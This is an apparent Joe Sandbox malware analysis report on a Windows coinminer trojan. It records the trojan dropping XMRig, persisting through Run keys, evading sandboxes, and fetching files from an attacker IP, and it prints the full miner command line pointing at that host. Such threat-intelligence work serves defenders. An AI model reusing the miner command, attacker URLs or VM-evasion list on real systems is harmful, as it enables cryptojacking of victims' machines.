Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\System\process.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	System information queried: FirmwareTableInformation			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: config.exe.0.dr	Binary or memory string: ?VGAUTHSERVICE.EXEVMSRVC.EXETCPVIEW.EXEWIRESHARK.EXEFIDDLER.EXEVMWARE.EXEVIRTUALBOX.EXEPROCEXP.EXEAUTOIT.EXEVBOXTRAY.EXEVMTOOLSD.EXEVMRAWDSK.SYS.VMUSBMOUSE.SYS.DF5SERV.EXEVBOXSERVICE.EXEVBOXTRAY.EXEVBOXCONTROL.EXEVBOXCLIENT.EXEVBOXVIDEO.EXEVBOXMOUSE.EXEVBOXNETADP.EXEPERFMON.EXETASKMGR.EXETCPVIEW.EXEPROCMON.EXEX
Source: config.exe	Binary or memory string: VGAUTHSERVICE.EXEVMSRVC.EXETCPVIEW.EXEWIRESHARK.EXEFIDDLER.EXEVMWARE.EXEVIRTUALBOX.EXEPROCEXP.EXEAUTOIT.EXEVBOXTRAY.EXEVMTOOLSD.EXEVMRAWDSK.SYS.VMUSBMOUSE.SYS.DF5SERV.EXEVBOXSERVICE.EXEVBOXTRAY.EXEVBOXCONTROL.EXEVBOXCLIENT.EXEVBOXVIDEO.EXEVBOXMOUSE.EXEVBOXNETA
Source: config.exe.0.dr	Binary or memory string: VGAUTHSERVICE.EXEVMSRVC.EXETCPVIEW.EXEWIRESHARK.EXEFIDDLER.EXEVMWARE.EXEVIRTUALBOX.EXEPROCEXP.EXEAUTOIT.EXEVBOXTRAY.EXEVMTOOLSD.EXEVMRAWDSK.SYS.VMUSBMOUSE.SYS.DF5SERV.EXEVBOXSERVICE.EXEVBOXTRAY.EXEVBOXCONTROL.EXEVBOXCLIENT.EXEVBOXVIDEO.EXEVBOXMOUSE.EXEVBOXNETADP.EXEPERFMON.EXETASKMGR.EXETCPVIEW.EXEPROCMON.EXE
Source: pTVKHqys2h.exe, 00000000.00000002.2174028262.000001D5116DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXEEXE.EXE.A
Source: pTVKHqys2h.exe, config.exe	Binary or memory string: P.EXEPERFMON.EXETASKMGR.EXETCPVIEW.EXEPROCMON.EXE
Source: config.exe, 00000005.00000002.2260822305.00000225733AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXEEXEEXEET
Source: config.exe, 00000005.00000002.2260822305.00000225733AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXEEKY.EXE%A

Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Window / User API: threadDelayed 472	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Window / User API: threadDelayed 1900	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Window / User API: threadDelayed 1656	Jump to behavior

Source: C:\Users\user\Desktop\pTVKHqys2h.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\WinRing0x64.sys

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\System\process.exe TID: 6100	Thread sleep count: 472 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe TID: 6100	Thread sleep count: 1900 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe TID: 1784	Thread sleep count: 1656 > 30	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior

Source: config.exe.0.dr	Binary or memory string: vgauthservice.exevmsrvc.exetcpview.exewireshark.exefiddler.exevmware.exeVirtualBox.exeprocexp.exeautoit.exevboxtray.exevmtoolsd.exevmrawdsk.sys.vmusbmouse.sys.df5serv.exevboxservice.exeVBoxTray.exeVBoxControl.exeVBoxClient.exeVBoxVideo.exeVBoxMouse.exeVBoxNetAdp.exeperfmon.exeTaskmgr.exeTcpview.exeprocmon.exe
Source: process.exe, 00000002.00000002.3312192092.00000188D63F9000.00000004.00000020.00020000.00000000.sdmp, process.exe, 00000009.00000002.3312223228.000001BA35168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: config.exe	Binary or memory string: vgauthservice.exevmsrvc.exetcpview.exewireshark.exefiddler.exevmware.exeVirtualBox.exeprocexp.exeautoit.exevboxtray.exevmtoolsd.exevmrawdsk.sys.vmusbmouse.sys.df5serv.exevboxservice.exeVBoxTray.exeVBoxControl.exeVBoxClient.exeVBoxVideo.exeVBoxMouse.exeVBoxNetA
Source: process.exe, 00000002.00000002.3312192092.00000188D63F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: config.exe.0.dr	Binary or memory string: ?vgauthservice.exevmsrvc.exetcpview.exewireshark.exefiddler.exevmware.exeVirtualBox.exeprocexp.exeautoit.exevboxtray.exevmtoolsd.exevmrawdsk.sys.vmusbmouse.sys.df5serv.exevboxservice.exeVBoxTray.exeVBoxControl.exeVBoxClient.exeVBoxVideo.exeVBoxMouse.exeVBoxNetAdp.exeperfmon.exeTaskmgr.exeTcpview.exeprocmon.exeX
Source: config.exe, 00000005.00000002.2260822305.00000225733AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxservice.exeexes
Source: pTVKHqys2h.exe, 00000000.00000003.2173503071.000001D51171C000.00000004.00000020.00020000.00000000.sdmp, pTVKHqys2h.exe, 00000000.00000003.2173340896.000001D51171C000.00000004.00000020.00020000.00000000.sdmp, config.exe, 00000005.00000003.2260654842.00000225733D5000.00000004.00000020.00020000.00000000.sdmp, config.exe, 00000005.00000003.2260435819.00000225733D3000.00000004.00000020.00020000.00000000.sdmp, config.exe, 00000005.00000003.2260610327.00000225733D5000.00000004.00000020.00020000.00000000.sdmp, config.exe, 00000005.00000003.2260673697.00000225733D8000.00000004.00000020.00020000.00000000.sdmp, config.exe, 00000005.00000003.2260560891.00000225733D4000.00000004.00000020.00020000.00000000.sdmp, config.exe, 00000005.00000003.2260544103.00000225733D3000.00000004.00000020.00020000.00000000.sdmp, config.exe, 00000006.00000003.2341601489.000001994C840000.00000004.00000020.00020000.00000000.sdmp, config.exe, 00000006.00000003.2341577719.000001994C83E000.00000004.00000020.00020000.00000000.sdmp, config.exe, 00000006.00000002.2341938643.000001994C842000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: config.exe, 00000006.00000002.2341938643.000001994C818000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxmouse.exe.exe

Source: C:\Users\user\Desktop\pTVKHqys2h.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\pTVKHqys2h.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\pTVKHqys2h.exe	NtWriteFile: Indirect: 0x7FF7673288B6	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	NtCreateFile: Indirect: 0x7FF76726D349	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	NtReadFile: Indirect: 0x7FF767328796	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	NtWriteFile: Indirect: 0x7FF747B288B6	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	NtDeviceIoControlFile: Indirect: 0x7FF7672694DD	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	NtDeviceIoControlFile: Indirect: 0x7FF747A694DD	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	NtCreateFile: Indirect: 0x7FF747A6D349	Jump to behavior

Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Process created: C:\Users\user\AppData\Local\Temp\System\process.exe "C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\System\process.exe "C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background			Jump to behavior

Source: conhost.exe, 0000000A.00000002.3312221982.00000200D3431000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: conhost.exe, 0000000A.00000002.3312221982.00000200D3431000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 0000000A.00000002.3312221982.00000200D3431000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 0000000A.00000002.3312221982.00000200D3431000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System\temp.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\info.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Queries volume information: C:\Users\user\AppData\Local\System32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System\process.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\info.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Queries volume information: C:\Users\user\AppData\Local\System32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\System\process.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\pTVKHqys2h.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	2 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	1 Masquerading	OS Credential Dumping	31 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	11 Scripting	12 Process Injection	11 Virtualization/Sandbox Evasion	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	21 Registry Run Keys / Startup Folder	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	21 Registry Run Keys / Startup Folder	12 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
pTVKHqys2h.exe	16%	ReversingLabs	Win64.Trojan.CoinminerX

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\config.json	100%	Avira	PUA/CoinMiner.PF
C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe	100%	Avira	PUA/GM.Miner.ES
C:\Users\user\AppData\Local\System32\config.exe	16%	ReversingLabs	Win64.Trojan.CoinminerX
C:\Users\user\AppData\Local\Temp\System\process.exe (copy)	55%	ReversingLabs	Win64.Coinminer.XMRig
C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\WinRing0x64.sys	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe	55%	ReversingLabs	Win64.Coinminer.XMRig

Source	Detection	Scanner	Label
http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txt~	0%	Avira URL Cloud	safe
http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txtB	0%	Avira URL Cloud	safe
http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txtN	0%	Avira URL Cloud	safe
https://miningpoolstats.stream/raptoreum	0%	Avira URL Cloud	safe
https://supportportal.crowdstrike.com	0%	Avira URL Cloud	safe
http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txt	0%	Avira URL Cloud	safe
http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txtV	0%	Avira URL Cloud	safe
https://miningpoolstats.stream/monero	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
github.com	140.82.121.4	true	false		high
objects.githubusercontent.com	185.199.110.133	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txt~	config.exe, 00000005.00000002.2260822305.00000225733AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://supportportal.crowdstrike.com	pTVKHqys2h.exe, config.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://miningpoolstats.stream/raptoreum	rtm_ghostrider_example.cmd.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.zip	pTVKHqys2h.exe, 00000000.00000003.2168163268.000001D511798000.00000004.00000020.00020000.00000000.sdmp, pTVKHqys2h.exe, 00000000.00000003.2171776516.000001D51172B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txtB	config.exe, 00000005.00000002.2260822305.00000225733AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard%s	process.exe, 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, process.exe, 00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, xmrig.exe.0.dr	false		high
http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txt	pTVKHqys2h.exe, 00000000.00000003.2173687689.000001D5116FA000.00000004.00000020.00020000.00000000.sdmp, pTVKHqys2h.exe, 00000000.00000002.2174219149.000001D5116FA000.00000004.00000020.00020000.00000000.sdmp, pTVKHqys2h.exe, 00000000.00000003.2173394294.000001D5116FA000.00000004.00000020.00020000.00000000.sdmp, config.exe, 00000005.00000002.2260822305.00000225733AC000.00000004.00000020.00020000.00000000.sdmp, config.exe, 00000006.00000002.2341938643.000001994C818000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://xmrig.com/docs/algorithms	process.exe, 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, process.exe, 00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, xmrig.exe.0.dr	false		high
http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txtN	config.exe, 00000005.00000002.2260822305.00000225733AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://xmrig.com/benchmark/%s	process.exe, 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, process.exe, 00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, xmrig.exe.0.dr	false		high
https://miningpoolstats.stream/monero	pool_mine_example.cmd.0.dr	false	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	process.exe, 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, process.exe, 00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, xmrig.exe.0.dr	false		high
http://93.115.172.41/private/aW5zdHJ1Y3Rpb25zCg==.txtV	config.exe, 00000005.00000002.2260822305.00000225733AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.zipisco1n	pTVKHqys2h.exe, 00000000.00000003.2171776516.000001D51172B000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
93.115.172.41	unknown	Romania	39531	ALTER-NET-ASZorilorNr11SfGheorgheRO	true
140.82.121.4	github.com	United States	36459	GITHUBUS	false
185.199.110.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586034
Start date and time:	2025-01-08 16:39:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	pTVKHqys2h.exe renamed because original name is a hash value
Original Sample Name:	62f3a21db99bcd45371ca4845c7296af81ce3ff6f0adcaee3f1698317dd4898b.exe
Detection:	MAL
Classification:	mal100.expl.evad.mine.winEXE@11/15@2/3
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target config.exe, PID 940 because it is empty
Execution Graph export aborted for target pTVKHqys2h.exe, PID 3092 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: pTVKHqys2h.exe

Simulations

Behavior and APIs

Time	Type	Description
16:40:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run config C:\Users\user\AppData\Local\System32\config.exe
16:40:30	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run config C:\Users\user\AppData\Local\System32\config.exe
16:40:39	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
140.82.121.4	RfORrHIRNe.doc	Get hash	malicious	Unknown	Browse	github.com/ssbb36/stv/raw/main/5.mp3
185.199.110.133	sys_upd.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_menu..ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_phshop..ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_atCAD.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	vF20HtY4a4.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	xK44OOt7vD.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	Lm9IJ4r9oO.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_crypter.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
github.com	z.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	140.82.121.4
	h.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	140.82.121.4
	174.exe	Get hash	malicious	Xmrig	Browse	140.82.121.3
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	140.82.121.3
	Customer.exe	Get hash	malicious	XWorm	Browse	140.82.121.4
	Solara Bootstrapper.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	Solara.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	PO#6100008 Jan04.02.2024.Xls.js	Get hash	malicious	WSHRat, STRRAT	Browse	140.82.121.4
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	140.82.121.3
objects.githubusercontent.com	174.exe	Get hash	malicious	Xmrig	Browse	185.199.109.133
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	185.199.111.133
	https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.199.108.133
	ep_setup.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	ep_setup.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	https://pdf.ac/3eQ2md	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	185.199.108.133
	https://github.com/starise/win11-virtual-desktop-extension/releases/download/1.1.0/VirtualDesktopExtension-1.1.0.msi	Get hash	malicious	Unknown	Browse	185.199.108.133
	in.exe	Get hash	malicious	Babadeda, HTMLPhisher	Browse	185.199.111.133
	https://github.com/greenshot/greenshot/releases/download/Greenshot-RELEASE-1.2.10.6/Greenshot-INSTALLER-1.2.10.6-RELEASE.exe	Get hash	malicious	Unknown	Browse	185.199.108.133

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	https://my.remarkable.com/	Get hash	malicious	Unknown	Browse	151.101.64.176
	https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=	Get hash	malicious	Unknown	Browse	151.101.66.137
	https://u18282959.ct.sendgrid.net/ls/click?upn=u001.rEMfFlpAoJgeimh0eSdetqZJOaDEFgZEM86yJv-2FFqn4BDVcYSBJ7qe3MiIpMf7EHr39f_olH575WPuDKQ6-2BlwfkTb3bEPQyZlspfhjzLUkESeUKdz-2BSLVmhS-2BiNhtE4sjBDlEtszfbsE5c6igxavK3muY3tYeP6QkmX-2BJi-2BaLU6j8Wsp6hQUS9QOYhOuxeiGpmu9xPXTXniG-2FhK47xPzbY2a7dAVr4WH1EaPd9qfgngR-2BS0-2BE0l9vGYKsxljCm-2F3LXvjLQIge-2FSmK3YEyKDG8HCxUjDZIuKEbjKZRrfVUUqiw37aYZrphVQ5WvB0QOlR-2Be2shKtaVihd3RfTtBEd0NyHk9A-3D-3D	Get hash	malicious	Unknown	Browse	151.101.2.217
	https://mike_precisionsignz_com-dot-mm-event3.appspot.com/em_rVAL3dAGbChDeM11H7vU?url=https://levita-magnetics-inc.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	151.101.130.79
	Selvi Payroll Benefits & Bonus Agreementfdp.pdf	Get hash	malicious	Unknown	Browse	151.101.66.137
